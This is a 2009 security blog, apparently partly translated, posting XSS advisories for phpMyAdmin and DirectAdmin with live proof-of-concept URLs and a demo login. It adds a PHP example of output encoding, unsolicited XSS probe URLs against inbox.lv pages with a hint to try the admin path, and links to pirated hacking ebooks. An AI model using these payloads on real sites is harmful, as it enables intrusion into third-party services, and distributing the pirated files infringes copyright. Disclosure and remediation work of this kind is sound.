###############################################
Vuln. discovered by : r0t
Date: 30 june 2009
vendor link: http://www.phpmyadmin.net/
affected versions:
phpMyAdmin 3.2.0.1
phpMyAdmin 3.2.1-dev
phpMyAdmin 3.3.0-dev
phpMyAdmin 2.11.10-dev
phpMyAdmin 3.2.0-rc1
Other versions may also be affected.
###############################################
Vuln. Description:
phpMyAdmin contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the "db" parameter of "index.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
live PoC:
http://demo.phpmyadmin.net/MAINT_3_2_0/index.php?db=%22%3E%27%3E%3Cscript%3Ealert%28%2Fr0t%2F%29%3C%2Fscript%3E&token=f70d8ec4305c5a877f56c14554aced10
###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
Ps.
By changing the XSS test requests for popular products like phpMyAdmin, vulns like XSS will never end. To prove my words, just use the XSS PoC request from the live example with other parameters.
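The fix the Solution calls for, shown as an added PHP example written for this page (not phpMyAdmin's own code; the function names are hypothetical): the reflected parameter is rendered raw beside a version that HTML-encodes it at the output point. It takes the parameter name as an argument, so it covers the point in the Ps. that any reflected parameter carries the same risk, and it applies equally to the DirectAdmin "view" parameter advisory further down this page.

```php
<?php
// Example code added for this page; it is not phpMyAdmin's source and the
// function names are hypothetical. It shows the pattern the advisory
// describes (a query parameter echoed into HTML unencoded) beside the
// output-encoding fix the Solution calls for.

// Vulnerable pattern: the raw parameter value lands inside an attribute
// and inside element text. The advisory's payload starts with " and '
// so that it closes whichever quoting style surrounds it, then appends
// its own <script> element.
function render_param_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">'
         . '<h2>' . $name . ': ' . $value . '</h2>';
}

// Hardened pattern: encode at the output point for the HTML context.
// ENT_QUOTES is the part that is easy to get wrong: without it single
// quotes pass through untouched, which is exactly what the ' in the
// payload is there for (PHP only made ENT_QUOTES the default in 8.1).
// Naming the charset keeps the encoder from mis-reading multi-byte input.
function html_encode(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_param_safe(string $name, string $value): string
{
    $n = html_encode($name);
    $v = html_encode($value);
    return '<input type="text" name="' . $n . '" value="' . $v . '">'
         . '<h2>' . $n . ': ' . $v . '</h2>';
}

// Defence in depth for this particular parameter: a database name is not
// free text, so an allow-list check can reject junk before it is used at
// all. It does not replace output encoding, which must still happen for
// every reflected value regardless of where it came from.
function is_plausible_db_name(string $db): bool
{
    return (bool) preg_match('/^[A-Za-z0-9_\-]{1,64}$/', $db);
}

// Constructed input: the percent-encoded value of db= from the PoC URL on
// this page, decoded the way PHP decodes $_GET.
$payload = urldecode('%22%3E%27%3E%3Cscript%3Ealert%28%2Fr0t%2F%29%3C%2Fscript%3E');

echo "Unsafe rendering:\n", render_param_unsafe('db', $payload), "\n\n";
// In a browser the value attribute is terminated and the <script> runs.

echo "Encoded rendering:\n", render_param_safe('db', $payload), "\n\n";
// The same bytes arrive as entities and render as visible text; no
// attribute or element boundary is crossed.

echo "Allow-list check on the payload: ",
     var_export(is_plausible_db_name($payload), true), "\n";
echo "Allow-list check on a real name: ",
     var_export(is_plausible_db_name('information_schema'), true), "\n";
```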
Tuesday, 30 June 2009
Monday, 29 June 2009
XSS in SS.LV
Hackers Library
* Ebook - Computer) Hacking The Windows Registry.pdf
* (eBook - PDF) Hugo Cornwall - The Hacker's Handbook .pdf
* (eBook pdf) Hacking into computer systems - a beginners guide.pdf
* (ebook_-_pdf)_Hacking_IIS_Servers.pdf
* A Beginners Guide To Hacking Computer Systems.pdf
* amazon-hacks.chm
* Attacking the DNS Protocol.pdf
* Auerbach.Practical.Hacking.Techniques.and.Countermeasures.Nov.2006.pdf
* bsd-hacks.pdf
* Certified Ethical Hacker (CEH) v3.0 Official Course.pdf
* Computer - Hackers Secrets - e-book.pdf
* cracking-sql-passwords.pdf
* Crc Press - The Hacker'S Handbook.pdf
* Credit.Card.Visa.Hack.Ucam.Cl.Tr.560.[223.kB_www.netz.ru].pdf
* DangerousGoogle-SearchingForSecrets.pdf
* database hacker handbook.chm
* Dummies - Hack How To Create Keygens (1).pdf
* ebay-hacks-100-industrial-strength-tips-and-tools.pdf
* eBooks.OReilly.-.Wireless.Hacks.100.Industrial.-.Strength.Tips.and.Tools.chm
* ethical hacking, student guide.pdf
* excel-hacks.chm
* google-hacks.pdf
* Guide-to-Hacking-with-sub7 (1).doc
* Hack IT Security Through Penetration Testing.pdf
* Hack Proofing - Your Network - Internet Tradecraft.pdf
* Hack Proofing Linux A Guide to Open Source Security - Stangler, Lane - Syngress - ISBN 1-928994-34-2.pdf
* Hack Proofing Sun Solaris 8.pdf
* Hack Proofing Your E-Commerce Site.pdf
* Hack Proofing Your Identity In The Information Age.pdf
* Hack Proofing Your Network Second Edition.pdf
* Hack Proofing Your Network_First Edition.pdf
* Hack Proofing Your Web Applications.pdf
* Hacker Disassembling Uncovered.chm
* hacker ethic.pdf
* Hacker Linux Uncovered.chm
* Hacker Web Exploitation Uncovered.chm
* Hacker'S.Delight.chm
* Hackers Beware.pdf
* Hackers Secrets Revealed.pdf
* Hackers Secrets.pdf
* Hackers, Heroes Of The Computer Revolution.pdf
* Hackers_Secrets.pdf
* Hacker_s_Guide.pdf
* Hacking - Firewalls And Networks How To Hack Into Remote Computers.pdf
* Hacking - The Art of Exploitation.chm
* Hacking Cisco Routers.pdf
* Hacking Exposed - Network Security Secrets & Solutions, 2nd Edition.pdf
* Hacking Exposed Network Security Secrets & Solutions, Third Edition ch1.pdf
* Hacking For Dummies 1.pdf
* Hacking For Dummies 2.pdf
* Hacking For Dummies.pdf
* Hacking GMail.pdf
* Hacking IIS Servers.pdf
* Hacking into computer systems - a beginners guide.pdf
* hacking the windows registry .pdf
* Hacking Windows XP.pdf
* Hacking-ebook - CIA-Book-of-Dirty-Tricks1.pdf
* Hacking-Hacker's Guide.pdf
* Hacking-Hackers Secrets Revealed.pdf
* Hacking-Hugo Cornwall-The Hacker's Handbook .pdf
* Hacking-The Hacker Crackdown.pdf
* Hacking.For.Dummies.Access.To.Other.People's.System.Made.Simple.pdf
* Hacking.Guide.V3.1.pdf
* Hacking.nfo
* Hacking.sfv
* Hackproofing Oracle Application Server.pdf
* Hack_Attacks_Revealed_A_Complete_Reference_With_Custom_Security_Hacking_Toolkit.chm
* Hack_IT_Security_Through_Penetration_Testing.chm
* haking.txt
* Halting.The.Hacker.A.Practical.Guide.To.Computer.Security.chm
* How to Crack CD Protections.pdf
* John Wiley & Sons - Hacking For Dummies.pdf
* John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eBook-DDU.pdf
* linux-server-hacks.pdf
* little_black_book_oc_computer_viruses.pdf
* mac-os-hacks.chm
* McGraw-Hill - Hacking Exposed, 3rd Ed - Hacking Exposed Win2.pdf
* McGraw.Hacking.Exposed.Cisco.Networks.chm
* McGraw.Hill.HackNotes.Network.Security.Portable.Reference.eB.pdf
* McGraw.Hill.HackNotes.Web.Security.Portable.Reference.eBook-.pdf
* McGraw.Hill.HackNotes.Windows.Security.Portable.Reference.eB.pdf
* Mind Hacks - Tips & Tricks for Using Your Brain.chm
* network-security-hacks.chm
* No.Starch.Press.Hacking.The.Art.Of.Exploitation.chm
* O'Reilly - Online Investing Hacks.chm
* O'Reilly.-.Network.Security.Hacks.chm
* O'Reilly.Windows.Server.Hack.chm
* O'Reilly.Windows.Server.Hack.rar
* online-investing-hacks.chm
* OReilly Google Hacks, 1st Edition2003.pdf
* OReilly - Google Hacks.pdf
* Oreilly, Paypal Hacks (2004) Ddu.chm
* OReilly,.IRC.Hacks.(2004).DDU.chm
* OReilly.SQL.Hacks.Nov.2006.chm
* OSB.Ethical.Hacking.and.Countermeasures.EC.Council.Exam.312.50.Student.Courseware.eBook-LiB.chm
* O_Reilly_-_Windows_XP_Hacks.chm
* PC Games - How to Crack CD Protection.pdf
* Security and Hacking - Anti-Hacker Tool Kit Second Edition.chm
* SoTayHacker1.0.chm
* spidering-hacks.chm
* SQL Hacks.chm
* SQLInjectionWhitePaper.pdf
* Syngress - Hacking a Terror Network. The Silent Threat of Covert Channels.pdf
* Syngress -- Hack Proofing Your Wireless Network.pdf
* Syngress Hack Proofing Your Identity in the Information Age.pdf
* Syngress.Buffer.Overflow.Attacks.Dec.2004.eBook-DDU.pdf
* Syngress.Hack.the.Stack.Oct.2006.pdf
* The Little Black Book Of Computer Virus.pdf
* The_20Little_20Black_20Book_20of_20Computer_20Viruses.pdf
* tivo-hacks.100-industrial-strength-tips-and-tools.pdf
* u23_Wiley - Hacking GPS - 2005 - (By Laxxuss).pdf
* Wiley.The.Database.Hackers.Handbook.Defending.Database.Servers.chm
* Win XP Hacks oreilly 2003.chm
* Windows Server Hacks.chm
* WinXP SP1 Hack.pdf
* Xbox-hack - AIM-2002-008.pdf
* Yahoo.Hacks.Oct.2005.chm
Download from Rapidshare:
r0t://rapidshare.com/files/82425846/Hacking.part01.rar
r0t://rapidshare.com/files/82442869/Hacking.part02.rar
r0t://rapidshare.com/files/82427993/Hacking.part02.rar
r0t://rapidshare.com/files/82445546/Hacking.part03.rar
r0t://rapidshare.com/files/82430177/Hacking.part03.rar
r0t://rapidshare.com/files/82432614/Hacking.part04.rar
r0t://rapidshare.com/files/82448319/Hacking.part04.rar
r0t://rapidshare.com/files/82451101/Hacking.part05.rar
r0t://rapidshare.com/files/82454225/Hacking.part06.rar
r0t://rapidshare.com/files/82457503/Hacking.part07.rar
r0t://rapidshare.com/files/82460913/Hacking.part08.rar
r0t://rapidshare.com/files/82464586/Hacking.part09.rar
r0t://rapidshare.com/files/82468340/Hacking.part10.rar
r0t://rapidshare.com/files/82471881/Hacking.part11.rar
r0t://rapidshare.com/files/82473464/Hacking.part12.rar
If the download doesn't work for you, change/replace "r0t" with "http".
RTFM ;]
Thursday, 25 June 2009
BackTrack 4 Pre Release is out
Līgo, līgo, apparently there is still more beer than blood in my veins.
But that is not what this is about; this is about BackTrack 4, for which a "Pre Release" has just come out.

So whoever can't hold out and wait for the Final release, download it here. Compared with the BackTrack 4 beta, the size has grown noticeably, from 854 MB to 1390 MB; that no longer plays a big role, though: BackTrack 3 could be fitted onto a CD, while here there will still be plenty of free space left on a DVD :)
Likewise you can watch the Introduction Video or read the .PDF about what's new under the hood.
Saturday, 20 June 2009
SS.lv Horse Stable

I had just gone to ss.lv to look at the classifieds and my AntiVir starts screaming about malware in the JavaScript as soon as the ad window itself opens. Either some joker managed to slip it in unnoticed, or ss.lv is earning a bit on the side :) Crisis, crisis..
PS. Of course with FF it stays quiet, because it is aimed specifically at IE.
Here is one of the files:
h**p://i.ss.lv/w_inc/decoder.js
CONTENTS
Throwing it into virustotal.com, these are the results we got.
Of 41 AVs, 2 raised the alarm:
AntiVir 7.9.0.19 HEUR/HTML.Malware
McAfee-GW-Edition 6.7.6 Heuristic.HTML.Malware
Anti XSS in inbox.lv
I don't use Inbox.lv myself, so you could say I didn't even know what that beast looks like. While Googling I stumbled by chance onto a blog where, supposedly, the following is published:
"Jul 2001–Feb 2007: Chief Developer at Inbox.lv, largest Latvian Internet portal, proud to say it moved from #4 to #1 in terms of weekly unique visitors since I joined the company." or simply Viktors Rotanovs.
Fine, of course one gets the impression that a Chief Developer is probably mega good; I don't doubt his professionalism for a moment, and look, there is even a tutorial on the blog about Anti-XSS, so supposedly everything at inbox.lv should be in order; let me go and take a look.
I was a bit surprised that for the most part nothing at that mega portal is written with their own hands*; ready-made, slightly modified software is taken as the base, e.g. the mail itself is pure Horde, and that Amigos is one of the MySpace clones floating around the web.
Now about XSS: I took a glance, without particularly trying and without even changing the test request, and found a couple. In short, I think all of this appeared after 2007, because Viktors would not have allowed it.. :)
Amigos, or the MySpace clone
MySpace Clone
http://amigos.inbox.lv/index.php?mode=report_spam&cat=1&id=155522&from=%22%3E%3Cscript%3Ealert(111);%3C/script%3E
http://amigos.inbox.lv/index.php?mode=report_spam&cat=1&id=155522%22%3E%3Cscript%3Ealert(111);%3C/script%3E
http://amigos.inbox.lv/index.php?mode=report_spam&cat=1%22%3E%3Cscript%3Ealert(111);%3C/script%3E
ps. admin in place of index and we are in business :)
http://work.inbox.lv/darbs/o-%22%3E%3Cscript%3Ealert(111);%3C/script%3E.html
http://smart.inbox.lv/?logout=1%22%3E%3Cscript%3Ealert(111);%3C/script%3E
http://smart.inbox.lv/cr_game/index.php?game_id=15420&rnd=%22%3E%3Cscript%3Ealert(111);%3C/script%3E
http://smart.inbox.lv/cr_game/index.php?game_id=%22%3E%3Cscript%3Ealert(111);%3C/script%3E
If you believe the readme.html file lying around there, the WP version is 1.5 :)
http://company.inbox.lv/news/readme.html
PS. I apologise in advance for any inconvenience caused; I have no complaints against Viktors or the inbox.lv team, I was just passing by to see how you are doing.
Friday, 19 June 2009
DirectAdmin <= v1.33.6 XSS vuln.
###############################################
Vuln. discovered by : r0t
Date: 19 June 2009
vendor:http://www.directadmin.com/
affected versions: v1.33.6; other versions may also be affected.
###############################################
DirectAdmin contains a flaw that allows remote cross-site scripting attacks. Input passed to the "view" parameter in "CMD_REDIRECT" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
##############################################
live PoC:
http://www.directadmin.com:2222/CMD_REDIRECT?view=advanced&sort1%22%3E%3Cscript%3Ealert(111);%3C/script%3E=1&domain=demo.com
PS.
need to login:
demo_user:demo
###############################################
Solution:
Filter malicious characters and character sequences in a web proxy.
###############################################